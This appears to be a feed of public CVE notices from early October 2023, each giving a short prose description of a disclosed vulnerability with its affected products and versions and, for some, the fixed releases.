🚨 CVE-2023-32971A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.We have already fixed the vulnerability in the following versions:QTS 5.0.1.2425 build 20230609 and laterQTS 5.1.0.2444 build 20230629 and laterQTS 4.5.4.2467 build 20230718 and laterQuTS hero h5.0.1.2515 build 20230907 and laterQuTS hero h5.1.0.2424 build 20230609 and laterQuTS hero h4.5.4.2476 build 20230728 and laterQuTScloud c5.1.0.2498 and later🎖@cveNotify |
|
| 2023-10-06 19:22:12 |
🚨 CVE-2023-32972A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.We have already fixed the vulnerability in the following versions:QTS 5.0.1.2425 build 20230609 and laterQTS 5.1.0.2444 build 20230629 and laterQTS 4.5.4.2467 build 20230718 and laterQuTS hero h5.0.1.2515 build 20230907 and laterQuTS hero h5.1.0.2424 build 20230609 and laterQuTS hero h4.5.4.2476 build 20230728 and laterQuTScloud c5.1.0.2498 and later🎖@cveNotify |
|
| 2023-10-06 19:22:11 |
🚨 CVE-2023-44807D-Link DIR-820L 1.05B03 has a stack overflow vulnerability in the cancelPing function.🎖@cveNotify |
|
| 2023-10-06 19:22:10 |
🚨 CVE-2023-4911A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.🎖@cveNotify |
|
| 2023-10-06 19:22:08 |
🚨 CVE-2023-43730Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "countries_name[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-06 19:22:07 |
🚨 CVE-2023-43731Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "zone_name" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-06 19:22:06 |
🚨 CVE-2023-43732Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "tax_class_title" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-06 19:22:04 |
🚨 CVE-2023-43733Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "company_address" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-06 19:22:03 |
🚨 CVE-2023-43734Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "name" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-06 19:22:01 |
🚨 CVE-2023-43735Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "formats_titles[7]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-06 19:22:00 |
🚨 CVE-2019-19726OpenBSD through 6.6 allows local users to escalate to root because a check for LD_LIBRARY_PATH in setuid programs can be defeated by setting a very small RLIMIT_DATA resource limit. When executing chpass or passwd (which are setuid root), _dl_setup_env in ld.so tries to strip LD_LIBRARY_PATH from the environment, but fails when it cannot allocate memory. Thus, the attacker is able to execute their own library code as root.🎖@cveNotify |
|
| 2023-10-06 19:21:59 |
🚨 CVE-2020-6215SAP NetWeaver AS ABAP Business Server Pages Test Application IT00, versions 700, 701, 702, 730, 731, 740, 750, 751, 752, 753, 754, allows an attacker to redirect users to a malicious site due to insufficient URL validation and steal credentials of the victim, leading to URL Redirection vulnerability.🎖@cveNotify |
|
| 2023-10-06 19:21:58 |
🚨 CVE-2019-6293An issue was discovered in the function mark_beginning_as_normal in nfa.c in flex 2.6.4. There is a stack exhaustion problem caused by the mark_beginning_as_normal function making recursive calls to itself in certain scenarios involving lots of '*' characters. Remote attackers could leverage this vulnerability to cause a denial-of-service.🎖@cveNotify |
|
| 2023-10-06 18:22:05 |
🚨 CVE-2023-44836D-Link DIR-823G A1V1.0.2B05 was discovered to contain a buffer overflow via the SSID parameter in the SetWLanRadioSettings function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2023-10-06 18:22:04 |
🚨 CVE-2023-44837D-Link DIR-823G A1V1.0.2B05 was discovered to contain a buffer overflow via the Password parameter in the SetWanSettings function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2023-10-06 18:22:03 |
🚨 CVE-2023-44838D-Link DIR-823G A1V1.0.2B05 was discovered to contain a buffer overflow via the TXPower parameter in the SetWLanRadioSettings function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2023-10-06 18:22:01 |
🚨 CVE-2021-32050Some MongoDB Drivers may erroneously publish events containing authentication-related data to a command listener configured by an application. The published events may contain security-sensitive data when specific authentication-related commands are executed.Without due care, an application may inadvertently expose this sensitive information, e.g., by writing it to a log file. This issue only arises if an application enables the command listener feature (this is not enabled by default).This issue affects the MongoDB C Driver 1.0.0 prior to 1.17.7, MongoDB PHP Driver 1.0.0 prior to 1.9.2, MongoDB Swift Driver 1.0.0 prior to 1.1.1, MongoDB Node.js Driver 3.6 prior to 3.6.10, MongoDB Node.js Driver 4.0 prior to 4.17.0 and MongoDB Node.js Driver 5.0 prior to 5.8.0. This issue also affects users of the MongoDB C++ Driver dependent on the C driver 1.0.0 prior to 1.17.7 (C++ driver prior to 3.7.0).🎖@cveNotify |
|
| 2023-10-06 18:22:00 |
🚨 CVE-2020-24165An issue was discovered in TCG Accelerator in QEMU 4.2.0, allows local attackers to execute arbitrary code, escalate privileges, and cause a denial of service (DoS).🎖@cveNotify |
|
| 2023-10-06 18:21:58 |
🚨 CVE-2023-40217An issue was discovered in Python before 3.8.18, 3.9.x before 3.9.18, 3.10.x before 3.10.13, and 3.11.x before 3.11.5. It primarily affects servers (such as HTTP servers) that use TLS client authentication. If a TLS server-side socket is created, receives data into the socket buffer, and then is closed quickly, there is a brief window where the SSLSocket instance will detect the socket as "not connected" and won't initiate a handshake, but buffered data will still be readable from the socket buffer. This data will not be authenticated if the server-side TLS peer is expecting client certificate authentication, and is indistinguishable from valid TLS stream data. Data is limited in size to the amount that will fit in the buffer. (The TLS connection cannot directly be used for data exfiltration because the vulnerable code path requires that the connection be closed on initialization of the SSLSocket.)🎖@cveNotify |
|
| 2023-10-06 18:21:57 |
🚨 CVE-2023-32559A privilege escalation vulnerability exists in the experimental policy mechanism in all active release lines: 16.x, 18.x and, 20.x. The use of the deprecated API `process.binding()` can bypass the policy mechanism by requiring internal modules and eventually take advantage of `process.binding('spawn_sync')` run arbitrary code, outside of the limits defined in a `policy.json` file. Please note that at the time this CVE was issued, the policy is an experimental feature of Node.js.🎖@cveNotify |
|
| 2023-10-05 23:22:04 |
🚨 CVE-2023-5441NULL Pointer Dereference in GitHub repository vim/vim prior to 20d161ace307e28690229b68584f2d84556f8960.🎖@cveNotify |
|
| 2023-10-05 23:22:00 |
🚨 CVE-2023-40920Prixan prixanconnect up to v1.62 was discovered to contain a SQL injection vulnerability via the component CartsGuruCatalogModuleFrontController::importProducts().🎖@cveNotify |
|
| 2023-10-05 23:21:59 |
🚨 CVE-2023-43284An issue in D-Link Wireless MU-MIMO Gigabit AC1200 Router DIR-846 firmware version 100A53DBR-Retail allows a remote attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-10-05 23:21:58 |
🚨 CVE-2023-43981Presto Changeo testsitecreator up to 1.1.1 was discovered to contain a deserialization vulnerability via the component delete_excluded_folder.php.🎖@cveNotify |
|
| 2023-10-05 23:21:57 |
🚨 CVE-2023-44024SQL injection vulnerability in KnowBand Module One Page Checkout, Social Login & Mailchimp (supercheckout) v.8.0.3 and before allows a remote attacker to execute arbitrary code via a crafted request to the updateCheckoutBehaviour function in the supercheckout.php component.🎖@cveNotify |
|
| 2023-10-05 17:22:32 |
🚨 CVE-2023-33029Memory corruption in DSP Service during a remote call from HLOS to DSP.🎖@cveNotify |
|
| 2023-10-05 17:22:31 |
🚨 CVE-2022-22447IBM Disconnected Log Collector 1.0 through 1.8.2 is vulnerable to potential security misconfigurations that could disclose unintended information. IBM X-Force ID: 224648.🎖@cveNotify |
|
| 2023-10-05 17:22:29 |
🚨 CVE-2023-35905IBM FileNet Content Manager 5.5.8, 5.5.10, and 5.5.11 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 259384.🎖@cveNotify |
|
| 2023-10-05 17:22:27 |
🚨 CVE-2023-39647Improper neutralization of SQL parameter in Theme Volty CMS Category Product module for PrestaShop. In the module “Theme Volty CMS Category Product” (tvcmscategoryproduct) up to version 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.🎖@cveNotify |
|
| 2023-10-05 17:22:26 |
🚨 CVE-2023-37404IBM Observability with Instana 1.0.243 through 1.0.254 could allow an attacker on the network to execute arbitrary code on the host after a successful DNS poisoning attack. IBM X-Force ID: 259789.🎖@cveNotify |
|
| 2023-10-05 17:22:24 |
🚨 CVE-2023-39646Improper neutralization of SQL parameter in Theme Volty CMS Category Chain Slider module for PrestaShop. In the module “Theme Volty CMS Category Chain Slide"(tvcmscategorychainslider) up to version 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.🎖@cveNotify |
|
| 2023-10-05 17:22:22 |
🚨 CVE-2023-39648Improper neutralization of SQL parameter in Theme Volty CMS Testimonial module for PrestaShop. In the module “Theme Volty CMS Testimonial” (tvcmstestimonial) up to version 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.🎖@cveNotify |
|
| 2023-10-05 17:22:20 |
🚨 CVE-2023-39649Improper neutralization of SQL parameter in Theme Volty CMS Category Slider module for PrestaShop. In the module “Theme Volty CMS Category Slider” (tvcmscategoryslider) up to version 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.🎖@cveNotify |
|
| 2023-10-05 17:22:19 |
🚨 CVE-2023-44974An arbitrary file upload vulnerability in the component /admin/plugin.php of Emlog Pro v2.2.0 allows attackers to execute arbitrary code via uploading a crafted PHP file.🎖@cveNotify |
|
| 2023-10-05 17:22:17 |
🚨 CVE-2023-43976An issue in CatoNetworks CatoClient before v.5.4.0 allows attackers to escalate privileges and winning the race condition (TOCTOU) via the PrivilegedHelperTool component.🎖@cveNotify |
|
| 2023-10-05 17:22:16 |
🚨 CVE-2023-39645Improper neutralization of SQL parameter in Theme Volty CMS Payment Icon module for PrestaShop. In the module “Theme Volty CMS Payment Icon” (tvcmspaymenticon) up to version 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.🎖@cveNotify |
|
| 2023-10-05 17:22:14 |
🚨 CVE-2023-44973An arbitrary file upload vulnerability in the component /content/templates/ of Emlog Pro v2.2.0 allows attackers to execute arbitrary code via uploading a crafted PHP file.🎖@cveNotify |
|
| 2023-10-05 17:22:09 |
🚨 CVE-2023-30735Improper Preservation of Permissions vulnerability in SAssistant prior to version 8.7 allows local attackers to access backup data in SAssistant.🎖@cveNotify |
|
| 2023-10-05 17:22:08 |
🚨 CVE-2023-30737Improper access control vulnerability in Samsung Health prior to version 6.24.3.007 allows attackers to access sensitive information via implicit intent.🎖@cveNotify |
|
| 2023-10-05 17:22:06 |
🚨 CVE-2023-33034Memory corruption while parsing the ADSP response command.🎖@cveNotify |
|
| 2023-10-05 17:22:05 |
🚨 CVE-2023-43656matrix-hookshot is a Matrix bot for connecting to external services like GitHub, GitLab, JIRA, and more. Instances that have enabled transformation functions (those that have `generic.allowJsTransformationFunctions` in their config), may be vulnerable to an attack where it is possible to break out of the `vm2` sandbox and as a result Hookshot will be vulnerable to this. This problem is only likely to affect users who have allowed untrusted users to apply their own transformation functions. If you have only enabled a limited set of trusted users, this threat is reduced (though not eliminated). Version 4.5.0 and above of hookshot include a new sandbox library which should better protect users. Users are advised to upgrade. Users unable to upgrade should disable `generic.allowJsTransformationFunctions` in the config.🎖@cveNotify |
|
| 2023-10-05 17:22:03 |
🚨 CVE-2023-43320An issue in Proxmox Server Solutions GmbH Proxmox VE v.5.4 thru v.8.0, Proxmox Backup Server v.1.1 thru v.3.0, and Proxmox Mail Gateway v.7.1 thru v.8.0 allows a remote authenticated attacker to escalate privileges via bypassing the two-factor authentication component.🎖@cveNotify |
|
| 2023-10-05 17:22:02 |
🚨 CVE-2023-5215A flaw was found in libnbd. A server can reply with a block size larger than 2^63 (the NBD spec states the size is a 64-bit unsigned value). This issue could lead to an application crash or other unintended behavior for NBD clients that doesn't treat the return value of the nbd_get_size() function correctly.🎖@cveNotify |
|
| 2023-10-05 17:22:01 |
🚨 CVE-2023-24594When an SSL profile is configured on a Virtual Server, undisclosed traffic can cause an increase in CPU or SSL accelerator resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-10-05 17:21:59 |
🚨 CVE-2023-5256In certain scenarios, Drupal's JSON:API module will output error backtraces. With some configurations, this may cause sensitive information to be cached and made available to anonymous users, leading to privilege escalation.This vulnerability only affects sites with the JSON:API module enabled, and can be mitigated by uninstalling JSON:API.The core REST and contributed GraphQL modules are not affected.🎖@cveNotify |
|
| 2023-10-05 12:51:57 |
🚨 CVE-2023-451591E Client installer can perform arbitrary file deletion on protected files. A non-privileged user could provide a symbolic link or Windows junction to point to a protected directory in the installer that the 1E Client would then clear on service startup. A hotfix is available Q23092 that forces the 1E Client to check for a symbolic link or junction and if it finds one refuses to use that path and instead creates a path involving a random GUID.🎖@cveNotify |
|
| 2023-10-05 10:51:58 |
🚨 CVE-2021-21551Dell dbutil_2_3.sys driver contains an insufficient access control vulnerability which may lead to escalation of privileges, denial of service, or information disclosure. Local authenticated user access is required.🎖@cveNotify |
|
| 2023-10-05 10:51:57 |
🚨 CVE-2023-45198ftpd before "NetBSD-ftpd 20230930" can leak information about the host filesystem before authentication via an MLSD or MLST command. tnftpd (the portable version of NetBSD ftpd) before 20231001 is also vulnerable.🎖@cveNotify |
|
| 2023-10-05 06:22:13 |
🚨 CVE-2023-2544Authorization bypass vulnerability in UPV PEIX, affecting the component "pdf_curri_new.php". Through a POST request, an authenticated user could change the ID parameter to retrieve all the stored information of other registered users.🎖@cveNotify |
|
| 2023-10-05 06:22:12 |
🚨 CVE-2023-3349Information exposure vulnerability in IBERMATICA RPS 2019, which exploitation could allow an unauthenticated user to retrieve sensitive information, such as usernames, IP addresses or SQL queries sent to the application. By accessing the URL /RPS2019Service/status.html, the application enables the logging mechanism by generating the log file, which can be downloaded.🎖@cveNotify |
|
| 2023-10-05 06:22:11 |
🚨 CVE-2023-3350A Cryptographic Issue vulnerability has been found on IBERMATICA RPS, affecting version 2019. By firstly downloading the log file, an attacker could retrieve the SQL query sent to the application in plaint text. This log file contains the password hashes coded with AES-CBC-128 bits algorithm, which can be decrypted with a .NET function, obtaining the username's password in plain text.🎖@cveNotify |
|
| 2023-10-05 06:22:10 |
🚨 CVE-2023-4882DOS vulnerability that could allow an attacker to register a new VNF (Virtual Network Function) value. This action could trigger the args_assets() function defined in the arg-log.php file, which would then execute the args-abort.c file, causing the service to crash.🎖@cveNotify |
|
| 2023-10-05 06:22:09 |
🚨 CVE-2023-4883Invalid pointer release vulnerability. Exploitation of this vulnerability could allow an attacker to interrupt the correct operation of the service by sending a specially crafted json string to the VNF (Virtual Network Function), and triggering the ogs_sbi_message_free function, which could cause a service outage.🎖@cveNotify |
|
| 2023-10-05 06:22:08 |
🚨 CVE-2023-4884An attacker could send an HTTP request to an Open5GS endpoint and retrieve the information stored on the device due to the lack of Authentication.🎖@cveNotify |
|
| 2023-10-05 06:22:07 |
🚨 CVE-2023-4885Man in the Middle vulnerability, which could allow an attacker to intercept VNF (Virtual Network Function) communications resulting in the exposure of sensitive information.🎖@cveNotify |
|
| 2023-10-05 06:22:06 |
🚨 CVE-2023-3196This vulnerability could allow an attacker to store a malicious JavaScript payload in the login footer and login page description parameters within the administration panel.🎖@cveNotify |
|
| 2023-10-05 06:22:05 |
🚨 CVE-2023-4564This vulnerability could allow an attacker to store a malicious JavaScript payload in the broadcast message parameter within the admin panel.🎖@cveNotify |
|
| 2023-10-05 06:22:03 |
🚨 CVE-2023-4886A sensitive information exposure vulnerability was found in foreman. Contents of tomcat's server.xml file, which contain passwords to candlepin's keystore and truststore, were found to be world readable.🎖@cveNotify |
|
| 2023-10-05 06:22:02 |
🚨 CVE-2023-4817This vulnerability allows an authenticated attacker to upload malicious files by bypassing the restrictions of the upload functionality, compromising the entire device.🎖@cveNotify |
|
| 2023-10-05 06:22:01 |
🚨 CVE-2023-5353Improper Access Control in GitHub repository salesagility/suitecrm prior to 7.14.1.🎖@cveNotify |
|
| 2023-10-05 06:22:00 |
🚨 CVE-2023-42508JFrog Artifactory prior to version 7.66.0 is vulnerable to specific endpoint abuse with a specially crafted payload, which can lead to unauthenticated users being able to send emails with manipulated email body.🎖@cveNotify |
|
| 2023-10-05 06:21:59 |
🚨 CVE-2023-32791Cross-Site Request Forgery (CSRF) vulnerability in NXLog Manager 5.6.5633 version. This vulnerability allows an attacker to manipulate and delete user accounts within the platform by sending a specifically crafted query to the server. The vulnerability is based on the lack of proper validation of the origin of incoming requests.🎖@cveNotify |
|
| 2023-10-05 06:21:58 |
🚨 CVE-2023-32792Cross-Site Request Forgery (CSRF) vulnerability in NXLog Manager 5.6.5633 version. This vulnerability allows an attacker to eliminate roles within the platform by sending a specifically crafted query to the server. The vulnerability is based on the absence of proper validation of the origin of incoming requests.🎖@cveNotify |
|
| 2023-10-05 06:21:57 |
🚨 CVE-2023-32790Cross-Site Scripting (XSS) vulnerability in NXLog Manager 5.6.5633 version. This vulnerability allows an attacker to inject a malicious JavaScript payload into the 'Full Name' field during a user edit, due to improper sanitization of the input parameter.🎖@cveNotify |
|
| 2023-10-05 00:52:06 |
🚨 CVE-2023-35803IQ Engine before 10.6r2 on Extreme Network AP devices has a Buffer Overflow.🎖@cveNotify |
|
| 2023-10-05 00:52:05 |
🚨 CVE-2023-40299Kong Insomnia 2023.4.0 on macOS allows attackers to execute code and access restricted files, or make requests for TCC permissions, by using the DYLD_INSERT_LIBRARIES environment variable.🎖@cveNotify |
|
| 2023-10-05 00:52:04 |
🚨 CVE-2023-43321File Upload vulnerability in Digital China Networks DCFW-1800-SDC v.3.0 allows an authenticated attacker to execute arbitrary code via the wget function in the /sbin/cloudadmin.sh component.🎖@cveNotify |
|
| 2023-10-05 00:52:03 |
🚨 CVE-2023-43877Rite CMS 3.0 has Multiple Cross-Site scripting (XSS) vulnerabilities that allow attackers to execute arbitrary code via a payload crafted in the Home Page fields in the Administration menu.🎖@cveNotify |
|
| 2023-10-05 00:52:02 |
🚨 CVE-2023-4853A flaw was found in Quarkus where HTTP security policies are not sanitizing certain character permutations correctly when accepting requests, resulting in incorrect evaluation of permissions. This issue could allow an attacker to bypass the security policy altogether, resulting in unauthorized endpoint access and possibly a denial of service.🎖@cveNotify |
|
| 2023-10-04 22:22:17 |
🚨 CVE-2023-32669Authorization bypass vulnerability in BuddyBoss 2.2.9 version, the exploitation of which could allow an authenticated user to access and rename other users' albums. This vulnerability can be exploited by changing the album identification (id).🎖@cveNotify |
|
| 2023-10-04 22:22:16 |
🚨 CVE-2023-32670Cross-Site Scripting vulnerability in BuddyBoss 2.2.9 version, which could allow a local attacker with basic privileges to execute a malicious payload through the "[name]=image.jpg" parameter, allowing to assign a persistent javascript payload that would be triggered when the associated image is loaded.🎖@cveNotify |
|
| 2023-10-04 22:22:15 |
🚨 CVE-2023-42771Authentication bypass vulnerability in ACERA 1320 firmware ver.01.26 and earlier, and ACERA 1310 firmware ver.01.26 and earlier allows a network-adjacent unauthenticated attacker who can access the affected product to download configuration files and/or log files, and upload configuration files and/or firmware. They are affected when running in ST(Standalone) mode.🎖@cveNotify |
|
| 2023-10-04 22:22:14 |
🚨 CVE-2023-43627Path traversal vulnerability in ACERA 1320 firmware ver.01.26 and earlier, and ACERA 1310 firmware ver.01.26 and earlier allows a network-adjacent authenticated attacker to alter critical information such as system files by sending a specially crafted request. They are affected when running in ST(Standalone) mode.🎖@cveNotify |
|
| 2023-10-04 22:22:13 |
🚨 CVE-2023-3335Insertion of Sensitive Information into Log File vulnerability in Hitachi Ops Center Administrator on Linux allows local users to gain sensive information.This issue affects Hitachi Ops Center Administrator: before 10.9.3-00.🎖@cveNotify |
|
| 2023-10-04 22:22:12 |
🚨 CVE-2023-3967Allocation of Resources Without Limits or Throttling vulnerability in Hitachi Ops Center Common Services on Linux allows DoS.This issue affects Hitachi Ops Center Common Services: before 10.9.3-00.🎖@cveNotify |
|
| 2023-10-04 22:22:11 |
🚨 CVE-2023-5334The WP Responsive header image slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'sp_responsiveslider' shortcode in versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-10-04 22:22:10 |
🚨 CVE-2023-5345A use-after-free vulnerability in the Linux kernel's fs/smb/client component can be exploited to achieve local privilege escalation.In case of an error in smb3_fs_context_parse_param, ctx->password was freed but the field was not set to NULL which could lead to double free.We recommend upgrading past commit e6e43b8aa7cd3c3af686caf0c2e11819a886d705.🎖@cveNotify |
|
| 2023-10-04 22:22:09 |
🚨 CVE-2023-4211A local non-privileged user can make improper GPU memory processing operations to gain access to already freed memory.🎖@cveNotify |
|
| 2023-10-04 22:22:08 |
🚨 CVE-2023-33268An issue was discovered in DTS Monitoring 3.57.0. The parameter port within the SSL Certificate check function is vulnerable to OS command injection (blind).🎖@cveNotify |
|
| 2023-10-04 22:22:07 |
🚨 CVE-2023-33269An issue was discovered in DTS Monitoring 3.57.0. The parameter options within the WGET check function is vulnerable to OS command injection (blind).🎖@cveNotify |
|
| 2023-10-04 22:22:06 |
🚨 CVE-2023-33270An issue was discovered in DTS Monitoring 3.57.0. The parameter url within the Curl check function is vulnerable to OS command injection (blind).🎖@cveNotify |
|
| 2023-10-04 22:22:04 |
🚨 CVE-2023-38537A race condition in a network transport subsystem led to a heap use-after-free issue in established or unsilenced incoming audio/video calls that could have resulted in app termination or unexpected control flow with very low probability.🎖@cveNotify |
|
| 2023-10-04 22:22:03 |
🚨 CVE-2023-38538A race condition in an event subsystem led to a heap use-after-free issue in established audio/video calls that could have resulted in app termination or unexpected control flow with very low probability.🎖@cveNotify |
|
| 2023-10-04 22:22:02 |
🚨 CVE-2023-42449Hydra is the two-layer scalability solution for Cardano. Prior to version 0.13.0, it is possible for a malicious head initializer to extract one or more PTs for the head they are initializing due to incorrect data validation logic in the head token minting policy which then results in an flawed check for burning the head ST in the `initial` validator. This is possible because it is not checked in `HeadTokens.hs` that the datums of the outputs at the `initial` validator are equal to the real head ID, and it is also not checked in the `off-chain code`.During the `Initial` state of the protocol, if the malicious initializer removes a PT from the Hydra scripts it becomes impossible for any other participant to reclaim any funds they have attempted to commit into the head, as to do so the Abort transaction must burn all the PTs for the head, but they cannot burn the PT which the attacker controls and so cannot satisfy this requirement. That means the initializer can lock the other participants committed funds forever or until they choose to return the PT (ransom).The malicious initializer can also use the PT to spoof that they have committed a particular TxO when progressing the head into the `Open` state. For example, they could say they committed a TxO residing at their address containing 100 ADA, but in fact this 100 ADA was not moved into the head, and thus in order for an other participant to perform the fanout they will be forced to pay the attacker the 100 ADA out of their own funds, as the fanout transaction must pay all the committed TxOs (even though the attacker did not really commit that TxO). They can do this by placing the PT in a UTxO with a well-formed `Commit` datum with whatever contents they like, then use this UTxO in the `collectCom` transaction. There may be other possible ways to abuse having control of a PT.Version 0.13.0 fixes this issue.🎖@cveNotify |
|
| 2023-10-04 22:22:01 |
🚨 CVE-2023-42808Common Voice is the web app for Mozilla Common Voice, a platform for collecting speech donations in order to create public domain datasets for training voice recognition-related tools. Version 1.88.2 is vulnerable to reflected Cross-Site Scripting given that user-controlled data flows to a path expression (path of a network request). This issue may lead to reflected Cross-Site Scripting (XSS) in the context of Common Voice’s server origin. As of time of publication, it is unknown whether any patches or workarounds exist.🎖@cveNotify |
|
| 2023-10-04 18:52:24 |
🚨 CVE-2023-44217A local privilege escalation vulnerability in SonicWall Net Extender MSI client for Windows 10.2.336 and earlier versions allows a local low-privileged user to gain system privileges through running repair functionality.🎖@cveNotify |
|
| 2023-10-04 18:52:23 |
🚨 CVE-2023-44218A flaw within the SonicWall NetExtender Pre-Logon feature enables an unauthorized user to gain access to the host Windows operating system with 'SYSTEM' level privileges, leading to a local privilege escalation (LPE) vulnerability.🎖@cveNotify |
|
| 2023-10-04 18:52:22 |
🚨 CVE-2023-3654cashIT! - serving solutions. Devices from "PoS/ Dienstleistung, Entwicklung & Vertrieb GmbH" to 03.A06rks 2023.02.37 are affected by a origin bypass via the host header in an HTTP request. This vulnerability can be triggered by an HTTP endpoint exposed to the network.🎖@cveNotify |
|
| 2023-10-04 18:52:21 |
🚨 CVE-2022-40944Dairy Farm Shop Management System 1.0 is vulnerable to SQL Injection via sales-report-ds.php file.🎖@cveNotify |
|
| 2023-10-04 18:52:19 |
🚨 CVE-2022-40943Dairy Farm Shop Management System 1.0 is vulnerable to SQL Injection via bwdate-report-ds.php file.🎖@cveNotify |
|
| 2023-10-04 18:52:18 |
🚨 CVE-2023-41594Dairy Farm Shop Management System Using PHP and MySQL v1.1 was discovered to contain multiple SQL injection vulnerabilities in the Login function via the Username and Password parameters.🎖@cveNotify |
|
| 2023-10-04 18:52:17 |
🚨 CVE-2023-34666Cross-site scripting (XSS) vulnerability in Phpgurukul Cyber Cafe Management System 1.0 allows remote attackers to inject arbitrary web script or HTML via the admin username parameter.🎖@cveNotify |
|
| 2023-10-04 18:52:14 |
🚨 CVE-2022-31382Directory Management System v1.0 was discovered to contain a SQL injection vulnerability via the searchdata parameter in search-dirctory.php.🎖@cveNotify |
|
| 2023-10-04 18:52:12 |
🚨 CVE-2022-31383Directory Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in view-directory.php.🎖@cveNotify |
|
| 2023-10-04 18:52:11 |
🚨 CVE-2022-31384Directory Management System v1.0 was discovered to contain a SQL injection vulnerability via the fullname parameter in add-directory.php.🎖@cveNotify |
|
| 2023-10-04 18:52:10 |
🚨 CVE-2022-28992A Cross-Site Request Forgery (CSRF) in Online Banquet Booking System v1.0 allows attackers to change admin credentials via a crafted POST request.🎖@cveNotify |
|
| 2023-10-04 18:52:08 |
🚨 CVE-2022-29007Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Dairy Farm Shop Management System v1.0 allows attackers to bypass authentication.🎖@cveNotify |
|
| 2023-10-04 18:52:07 |
🚨 CVE-2022-29009Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Cyber Cafe Management System Project v1.0 allows attackers to bypass authentication.🎖@cveNotify |
|
| 2023-10-04 18:52:05 |
🚨 CVE-2022-29006Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Directory Management System v1.0 allows attackers to bypass authentication.🎖@cveNotify |
|
| 2023-10-04 18:52:04 |
🚨 CVE-2020-36062Dairy Farm Shop Management System v1.0 was discovered to contain hardcoded credentials in the source code which allows attackers access to the control panel if compromised.🎖@cveNotify |
|
| 2023-10-04 18:52:03 |
🚨 CVE-2023-20101A vulnerability in Cisco Emergency Responder could allow an unauthenticated, remote attacker to log in to an affected device using the root account, which has default, static credentials that cannot be changed or deleted. This vulnerability is due to the presence of static user credentials for the root account that are typically reserved for use during development. An attacker could exploit this vulnerability by using the account to log in to an affected system. A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands as the root user.🎖@cveNotify |
|
| 2023-10-04 18:52:02 |
🚨 CVE-2023-20235A vulnerability in the on-device application development workflow feature for the Cisco IOx application hosting infrastructure in Cisco IOS XE Software could allow an authenticated, remote attacker to access the underlying operating system as the root user. This vulnerability exists because Docker containers with the privileged runtime option are not blocked when they are in application development mode. An attacker could exploit this vulnerability by using the Docker CLI to access an affected device. The application development workflow is meant to be used only on development systems and not in production systems.🎖@cveNotify |
|
| 2023-10-04 18:52:01 |
🚨 CVE-2023-20259A vulnerability in an API endpoint of multiple Cisco Unified Communications Products could allow an unauthenticated, remote attacker to cause high CPU utilization, which could impact access to the web-based management interface and cause delays with call processing. This API is not used for device management and is unlikely to be used in normal operations of the device. This vulnerability is due to improper API authentication and incomplete validation of the API request. An attacker could exploit this vulnerability by sending a crafted HTTP request to a specific API on the device. A successful exploit could allow the attacker to cause a denial of service (DoS) condition due to high CPU utilization, which could negatively impact user traffic and management access. When the attack stops, the device will recover without manual intervention.🎖@cveNotify |
|
| 2023-10-04 18:52:00 |
🚨 CVE-2023-43804urllib3 is a user-friendly HTTP client library for Python. urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly. This issue has been patched in urllib3 version 1.26.17 or 2.0.5.🎖@cveNotify |
|
| 2023-10-04 18:51:59 |
🚨 CVE-2023-5371RTPS dissector memory leak in Wireshark 4.0.0 to 4.0.8 and 3.6.0 to 3.6.16 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-10-04 15:22:20 |
